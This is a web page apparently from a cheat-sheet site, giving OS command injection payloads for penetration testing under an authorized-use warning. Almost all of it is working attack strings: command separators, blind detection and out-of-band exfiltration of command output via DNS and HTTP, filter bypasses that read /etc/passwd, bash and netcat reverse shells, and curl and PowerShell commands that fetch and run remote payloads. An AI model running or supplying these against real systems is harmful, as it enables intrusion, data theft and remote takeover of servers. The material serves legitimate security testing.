CyberCheatsheets

Command Injection Cheat Sheet

OS command injection payloads, separators, blind detection, and filter bypasses for achieving RCE on authorized targets.

Web Application Securitycommand-injectioninjectionowasprcewebUpdated 2026-06-17

Overview

Command injection happens when user input is passed into an OS shell command unsanitized, letting you append or chain your own commands. Look for features that touch the system: ping/traceroute tools, file converters, backup utilities, and anything that shells out. If output isn't shown, confirm blindly with time delays or out-of-band callbacks.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Separators (chain your command)

Run after the original command (Unix)

; id

Pipe — your command runs regardless of the first

| id

Run only if the first succeeds

&& id

Run only if the first fails

|| id

Newline (URL-encoded) — works where ; is filtered

%0a id

Command substitution (inline output)

`id`   $(id)

Detect injection

Append to a ping field and look for command output

127.0.0.1; id

Confirm with a second command

127.0.0.1 && whoami

Substitution echoes a marker if injectable

$(echo vulnerable)

Blind detection

Time-based: response delays ~5s if injectable

127.0.0.1; sleep 5

OOB: watch your host for ICMP

127.0.0.1 & ping -c 5 10.10.14.5 &

Exfiltrate output via DNS (whoami in the subdomain)

; nslookup `whoami`.oast.fun

OOB exfil over HTTP, base64-encoded

; curl http://10.10.14.5/$(id|base64)

Filter bypasses

Quotes/backslashes break keyword blocklists

w'h'o'a'mi   wh\oami

Shell metacharacter insertion (ignored by bash)

who$@ami   c''at /etc/passwd

${IFS} substitutes a space when spaces are blocked

cat${IFS}/etc/passwd

Brace expansion avoids spaces

{cat,/etc/passwd}

Wildcards to avoid literal binary names

/???/c?t /etc/passwd

Base64-encode the whole command to dodge filters

echo aWQ= | base64 -d | bash

Get a shell

Bash reverse shell

; bash -c 'bash -i >& /dev/tcp/10.10.14.5/443 0>&1'

Netcat reverse shell (if -e is available)

; nc 10.10.14.5 443 -e /bin/sh

Pull and run a payload

; curl http://10.10.14.5/s.sh | bash

Windows PowerShell download-cradle

& powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/p.ps1')"

Tips

  • Try each separator (; | & && ||) — apps filter some but not all.
  • No output? Go blind: sleep for timing, or ping/curl/nslookup for out-of-band confirmation.
  • ${IFS}, brace expansion, and wildcards defeat naive space/keyword filters.
  • Fix = avoid shelling out; use language-native APIs and strict input allowlists.

References

Aide-mémoires similaires